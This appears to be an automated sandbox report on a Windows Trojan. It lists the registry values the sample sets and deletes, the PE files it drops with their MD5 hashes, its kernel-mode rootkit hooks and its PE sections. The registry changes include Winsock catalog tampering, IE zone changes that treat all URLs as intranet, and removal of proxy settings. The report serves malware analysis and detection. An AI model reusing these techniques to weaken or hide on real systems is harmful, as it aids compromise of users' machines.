[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9]
"Next_Catalog_Entry_ID" = "1001"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"Guid" = "710adbf0-ce88-40b4-a50d-231ada6593f0"

[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration]
"Provider List" = ""

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000009]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration\Providers\NetBIOS]
"WinSock 2.0 Provider ID" = "30 18 5F 8D 73 C2 CF 11 95 C8 00 80 5F 48 A1 92"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000011]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration]
"Setup Version" = "4105"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000007]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration]
"Known Static Providers" = "Tcpip, NwlnkIpx, NwlnkSpx, AppleTalk, IsoTp"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"Guid" = "b0278a28-76f1-4e15-b1df-14b209a12613"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0F CF 21 29 2E 4E 77 FE B6 5E A5 43 70 0E 28 BA"

[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration\Well Known Guids]
"AppleTalk" = "A0 17 3B 2C DF C6 CF 11 95 C8 00 80 5F 48 A1 92"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9]
"Serial_Access_Num" = "1"
"Num_Catalog_Entries" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileTracingMask" = "4294901760"

[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration\Well Known Guids]
"IsoTp" = "B0 CB E4 89 C1 B9 CF 11 95 C8 00 80 5F 48 A1 92"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration\Well Known Guids]
"McsXns" = "B1 CB E4 89 C1 B9 CF 11 95 C8 00 80 5F 48 A1 92"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

The Trojan deletes the following registry key(s):

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000007]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000006]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000009]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008]
[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration\Providers]
[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\00000001]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\00000003]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\00000002]
[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration\Well Known Guids]
[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration\Providers\Tcpip]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000012]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000013]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000011]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries]
[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration\Providers\NetBIOS]

The process EXE_temp3.exe:816 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9\Catalog_Entries\000000000005]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKCR\Shell.User\Group]
"bl" = "A9 91 9C 93 24 46 01 23 62 18 79 19 0C 77 50 72"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9\Catalog_Entries\000000000006]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 01 00 00 00 03 00 00 00 00 00 00 00"

[HKCR\Shell.User]
"mmc" = "0050563cacd6"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCR\Shell.User\Group\001]
"(Default)" = "4A 7C 2C 77 6E 02 24 14 9D DB D7 C6 BB 04 7A 13"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000002]
"LibraryPath" = "%SystemRoot%\System32\winrnr.dll"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000003]
"DisplayString" = "ÍøÂçλÖÃÖªÏþ (NLA) Ãû³Æ¿Õ¼ä"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5]
"Serial_Access_Num" = "4"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000002]
"StoresServiceClassInfo" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCR\Shell.User]
"nam" = "58lm/temptation.bin"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000003]
"Enabled" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000001]
"Version" = "0"

[HKCR\Shell.User\Group]
"lb" = "E0 89 2F 53 1D 22 70 19 48 38 3F 78 54 6B 83 93"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9\Catalog_Entries\000000000002]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKCR\Shell.User\Group]
"lh" = "C6 B4 D0 9F A2 CB D4 B0 BB AD FF A7 56 06 63 5D"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9\Catalog_Entries\000000000009]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5]
"Num_Catalog_Entries" = "3"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000003]
"SupportedNameSpace" = "15"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCR\Shell.User\Group\001]
"dat" = "1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "01 0B 74 25 87 0B 8C 56 3B B8 3C F3 4E 22 C1 A7"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000002]
"SupportedNameSpace" = "32"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9]
"Next_Catalog_Entry_ID" = "1027"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2]
"Current_Protocol_Catalog" = "Protocol_Catalog9"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000001]
"LibraryPath" = "%SystemRoot%\System32\mswsock.dll"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9\Catalog_Entries\000000000003]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000003]
"LibraryPath" = "%SystemRoot%\System32\mswsock.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000001]
"StoresServiceClassInfo" = "0"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000002]
"DisplayString" = "NTDS"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9\Catalog_Entries\000000000010]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2]
"WinSock_Registry_Version" = "2.0"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000003]
"Version" = "0"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000001]
"Enabled" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCR\Shell.User\Group]
"cfg" = "57 56 1B 01 5E 4C 05 5C 14 19 18 15 1E 0A 13 59"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000001]
"DisplayString" = "Tcpip"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9\Catalog_Entries\000000000011]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9\Catalog_Entries\000000000007]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000003]
"StoresServiceClassInfo" = "0"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000002]
"Enabled" = "1"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2]
"Current_NameSpace_Catalog" = "NameSpace_Catalog5"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9\Catalog_Entries\000000000004]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000001]
"SupportedNameSpace" = "12"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9\Catalog_Entries\000000000008]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "3C 00 00 00 01 00 00 00 03 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000001]
"ProviderId" = "40 9D 05 22 9E 7E CF 11 AE 5A 00 AA 00 A7 11 2B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9\Catalog_Entries\000000000001]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000002]
"ProviderId" = "EE 37 26 3B 80 E5 CF 11 A5 55 00 C0 4F D8 D4 AC"
"Version" = "0"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9]
"Serial_Access_Num" = "12"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000003]
"ProviderId" = "3A 24 42 66 A8 3B A6 4A BA A5 2E 0B D7 1F DD 83"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9]
"Num_Catalog_Entries" = "11"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"

The process MiniIE.exe:3436 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F5 D7 28 7A 25 5D D9 D2 9F EC C0 58 AD FB 76 5B"

[HKCR\Microsoft.PubIE]
"(Default)" = "%WinDir%\JMt\MiniIE.exe"

The process qtool.exe:3460 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DD D9 B6 E0 D6 CA 25 68 19 49 38 F7 A3 05 6F 90"

The process EXE_temp0.exe:980 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0E 3F D9 80 23 28 AE DA BA 09 DF 20 13 55 0A DA"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

The process wpzir.exe:3300 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "95 1B A5 9B 95 89 B1 80 07 DC 08 1E E3 81 E5 9C"

The process %original file name%.exe:1040 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4C 9A 60 99 5B 65 DF 0F 28 7E 33 17 29 04 B9 BF"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"EXE_temp1.EXE" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"EXE_temp4.EXE" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Dropped PE files

MD5 File path
30b0c990aec1f50be231a3856ecb3bf8 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\EXE_temp0.exe
aed6d5df54ffc8b690ac09b59b3ca430 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\EXE_temp1.EXE
2a1032cde760529d39f4c5f8726dc2a9 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\EXE_temp2.exe
a14c1a37f8bfa01fac48c2e55e0ba1b5 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\EXE_temp4.EXE
a15e8668aa777e4d4150aee35d2ff6a3 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Sawrdxeyd.exe
a0616a47dd5ee80322aef4316c392c28 c:\Program Files\Common Files\Lkcjzquw.exe
8ae4a1d90f2a6e9385945db349908df5 c:\Program Files\Common Files\mdhc\dsau.exe
cf31b64c744a98a0407f4507ae113702 c:\WINDOWS\JMt\MiniIE.exe
0bdf9d8c796730d85f4a1a249a033f8d c:\WINDOWS\JMt\sys32\qtool.exe
c20aa25e91066fccc444a58542c23dd9 c:\WINDOWS\JMt\sys32\shock.dll
5d92b4c13bafd09fad76ef97c48fec0e c:\WINDOWS\JMt\sys32\shock.exe
add24b3c6cb353cdad827d12c751427d c:\WINDOWS\JMt\win32\DPro.sys
a76ad9fe26c1986b1d7f1c8ef8d44c7b c:\WINDOWS\JMt\win32\reTcp.sys
43577fc3cc5c7db31ee2f778d738fda8 c:\WINDOWS\JMt\win32\rename.exe
cc686eb2b7a4ade59e1c4092cba060a9 c:\WINDOWS\JMt\win32\svchots.exe
e9e72a6dbeacd5baa07688de88180a48 c:\WINDOWS\JMt\wpzir.exe
39462f857848c335921707727b66df46 c:\WINDOWS\share\ico.dll
c6ad526a469588556ff14961929e0713 c:\WINDOWS\share\rsvp\objs.exe
a131b4be9f388351e102feb40192db80 c:\WINDOWS\system32\DqKgbb.dll
51af4e81bc4bd3abf1cb8ce8703b364f c:\WINDOWS\system32\drivers\HideSys.sys

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Trojan installs the following kernel-mode hooks:

ZwCreateSection

The Trojan installs the following kernel-mode hooks:

ZwOpenProcess
ZwQuerySystemInformation

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 1630 4096 2.08739 a5ac40d413ebeb6ce9558f2e31e30273
.rdata 8192 1002 4096 1.10247 845b3880bb89b7f2d62318a9a4946b4b
.data 12288 1172 4096 0.052325 98570c295ac0b95b533a0c5458850e63
.rsrc 16384 928 4096 0.559435 26a9e24fa9407d501ca0b0c40ee8d6a1
.fyf 20480 73728 73728 5.42306 5de1b1bb94e796f2272dd007d3f6e0a0
.FYF 94208 151552 151552 4.48946 b063438bbfbe3ad481ac57d58a6e5403
.fyf 245760 24576 24576 1.2573 99258b4abbf40d5dd4b49639f1d3e8ea
.fyf 270336 139264 139264 5.508 2b1cc40328f8cdd81d81a5fcc4a97692
.FYFa 409600 393216 393216 5.1687 518f5b687ef25cd9efa4eb3b02d16991

Dropped from:

Downloaded by:

